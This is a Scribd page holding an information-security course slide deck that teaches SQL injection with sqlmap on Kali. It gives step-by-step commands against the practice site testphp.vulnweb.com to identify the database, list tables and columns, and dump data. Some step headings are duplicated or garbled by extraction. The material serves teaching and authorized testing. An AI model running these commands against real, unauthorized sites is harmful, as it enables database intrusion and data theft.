Scribd
Upload
110 views

Operation Sheet 4.1 - SQLInjection

SQL injection allows malicious SQL queries to control databases. Sqlmap tests for SQL injection vulnerabilities and can exploit them to gather database information. The document provides steps for using Sqlmap against a vulnerable site: determining the database management system, listing tables, columns, and dumping column data to retrieve information stored in the database.

Uploaded by

ኣስፋ ሙሉ
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
110 views

Operation Sheet 4.1 - SQLInjection

SQL injection allows malicious SQL queries to control databases. Sqlmap tests for SQL injection vulnerabilities and can exploit them to gather database information. The document provides steps for using Sqlmap against a vulnerable site: determining the database management system, listing tables, columns, and dumping column data to retrieve information stored in the database.

Uploaded by

ኣስፋ ሙሉ
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Operation Sheet 4.

1 SQL
Injection in KALI SQLMap
ICT640 – Information Security

Presented by: Dr. Patrick D. Cerna


What is SQL injection
• SQL Injection is a code injection
technique where an attacker
executes malicious SQL queries
that control a web application’s
database. With the right set of
queries, a user can gain access
to information stored in
databases. SQLMAP tests
whether a ‘GET’ parameter is
vulnerable to SQL Injection.
Sql MAP
• There are many SQL injection tools, but
probably the most popular is sqlmap. In this
tutorial, we will use sqlmap to compromise a
MySQL database behind a website.  

• Sqlmap can be used for databases other than


MySQL, such Microsoft's SQL Server and
Oracle, but here we will focus its capabilities
on those ubiquitous web sites that are built
with PHP, Apache and MySQL such as
WordPress, Joomla and Drupal.
Step #1 Start sqlmap. First, fre up Kali and go
to Applications -> Database Assessment ->sqlmap,
Check the SQL MAP Details: sqlmap -h
Step 1: Determine the DBMS
Behind the Web Site
sqlmap -u
 
http://testphp.vulnweb.com/listproducts.ph
p?cat=1 --dbs
Step #2 Determine the DBMS
Behind the Web Site
http://testphp.vulnweb.com/
 
listproducts.php?cat=*
Step 3: List information about Tables
present in a particular Database 

sqlmap -u
http://testphp.vulnweb.com/listproduct
s.php?cat=1
-D acuart --tables
Step 4: List information about Tables present in a
particular Database

sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart --tables
Step 5: List information about the columns of a
particular table

sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1

-D acuart -T artists --columns


Step 6: Dump the data from the columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T artists -C aname --dump

where -C can be used to specify multiple column name separated by a comma,


and the –dump query retrieves the data

You might also like